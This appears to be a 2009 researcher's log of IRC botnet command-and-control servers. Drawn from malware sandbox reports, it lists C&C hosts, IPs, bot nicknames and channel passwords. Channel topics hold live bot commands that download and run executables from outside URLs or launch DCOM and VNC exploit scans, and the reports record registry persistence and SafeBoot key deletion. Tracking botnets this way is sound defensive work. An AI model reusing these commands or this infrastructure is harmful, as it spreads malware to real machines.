Month: November 2009

tx.mostafaaljaafari.net

67.43.232.36:8080
Nick: FpNYgjKTV
Username: ngyccn
Joined Channel: #rstn2
Channel Topic for Channel #rstn2: “* ipscan s.s.s dcom2 -f -s”

Other channels:
Now talking in ##xddc
Topic On: [ ##xddc ] [=t0Y0F21DYX4e6UWiqOP9ZY0vX4MOFnQpiS67nAcB1uLbI7sg33T9PIBDhDk/qm5 ]
Topic By: [ m1244 ]
Modes On: [ ##xddc ] [ +smntSMCu ]
Now talking in #xddc1
Topic On: [ #xddc1 ] [13 * download http://idfc.info/bnew.exe -e -f -s ]
Topic By:

dong.nagitiriheiwu.net

72.10.169.26:2293
Nick: akjHdYdP
Username: tpepiy
Joined Channel: #siwa
Channel Topic for Channel #siwa: “=XRlSYWHDxodKoKTdT7BxKpedXm7GERdOTvU41sULBVo0tVz3vs9al15JIViw”

ghostnet.ghostmarket.net

Remote Host  Port Number
58.30.17.229  8080

NICK {NEW-USA-XP-SXYOQB}
USER USA “” “lol” :USA
JOIN #!Rape
PONG :ghostnet.ghostmarket.net

Other details
* The following port was open in the system:
  Port  Protocol  Process
  1052  TCP       File.exe (%UserProfile%\File.exe)

Registry Modifications
* The newly created Registry Value is:
  o [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
    + Microsoft Drive Guard32 = “%UserProfile%\File.exe”
  so that File.exe runs every time Windows starts

74.81.64.25 (email bot)

74.81.64.25 (2345)
#info [21:41] [BRA|00|D|33418]: [IM]: Thread Activated: Sending Message With Email.

drego85.dyndns.org/drego85.ns0.it/drego85.no-ip.net

Host Name  IP Address
dell-d3e62f7e26  10.1.12.2
drego85.dyndns.org  67.220.65.39

* C&C Server: 67.220.65.39:6667
* Server Password:
* Username: XP-2174
* Nickname: [00|DEU|707227]
* Channel: #imbot (Password: config)
* Channeltopic: :.dl http://ownedrox.altervista.org/imbotv4.exe c:\startme32.exe 1

net.anddos.co.uk (anddos dci bot lol)

* Requested Host: net.anddos.co.uk
* Resulting Address: 94.23.153.223
* IRC Data
  o User Name: zgtlat
  o Host Name: “”
  o Server Name:
  o Real Name: zgtlat
  o Password: dickybob
  o Nick Name: ncrrpk
  o Non RFC Conform: 1
  + Channel
    # Name: #ohai3
    # Password: trb123trb
  + Notice Message Deleted
    # Value: :irc.goonet.net NOTICE AUTH :***

sip4.voipkosovasite.com

DNS Lookup
Host Name  IP Address
0  127.0.0.1
shitit.net  shitit.net 75.126.252.200

UDP Connections
Remote IP Address: 127.0.0.1 Port: 1045
Send Datagram: 53 packet(s) of size 1
Recv Datagram: 53 packet(s) of size 1

Download URLs
http://75.126.252.200/fly3.jpg (shitit.net)
Outgoing connection to remote server: shitit.net TCP port 80

DNS Lookup
Host Name  IP Address
dell-d3e62f7e26  10.1.10.2
sip4.voipkosovasite.com  82.114.87.46

* C&C Server: 82.114.87.46:1868
* Server Password:
* Username: XP-9971
* Nickname: [00|DEU|994663]

213.239.201.80 (ruski bots)

Remote Host  Port Number
213.239.201.80  8000
213.239.201.80  80

* The data identified by the following URL was then requested from the remote web server:
  o http://nero872.cn/a/

Registry Modifications
* The following Registry Keys were created:
  o HKEY_CURRENT_USER\Software\Minisoft
  o HKEY_CURRENT_USER\Software\Videohost
  o HKEY_CURRENT_USER\Software\XML
* The following Registry Keys were deleted:
  o HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal
  o HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\AppMgmt
  o HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\Base
  o HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\Boot Bus

Buchananas21.Coupe.Mx [risk.]

Remote Host  Port Number
66.90.110.138  7070

MODE [CPF|USA|00|P|20484] -ix
JOIN #FUD f1f4fud
PRIVMSG #FUD :[IM]: Thread Activated: Sending Message.
PONG Buchananas21.Coupe.Mx
NICK [CPF|USA|00|P|20484]
USER XP-9366 * 0 :COMPUTERNAME
PASS couperlz

Other details
* The following port was open in the system:
  Port  Protocol  Process
  1053  TCP       baeksyesrn.exe (%Windir%\baeksyesrn.exe)

Registry Modifications
* The newly created Registry Values are:
  o [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
    + Windows Sec

olivares2006.noip.es

85.214.114.224:6668
Nick: AUT[XP]1627252
Username: phuznpv
Joined Channel: ##tomillar
Channel Topic for Channel ##tomillar: “.asc vnc 75 0 0 -r -b “
Private Message to Channel ##tomillar: “[REALMBOT] Random Exploitation started on 192.168.x.x:5900 waiting 5 seconds for 0 minutes using 75 threads.”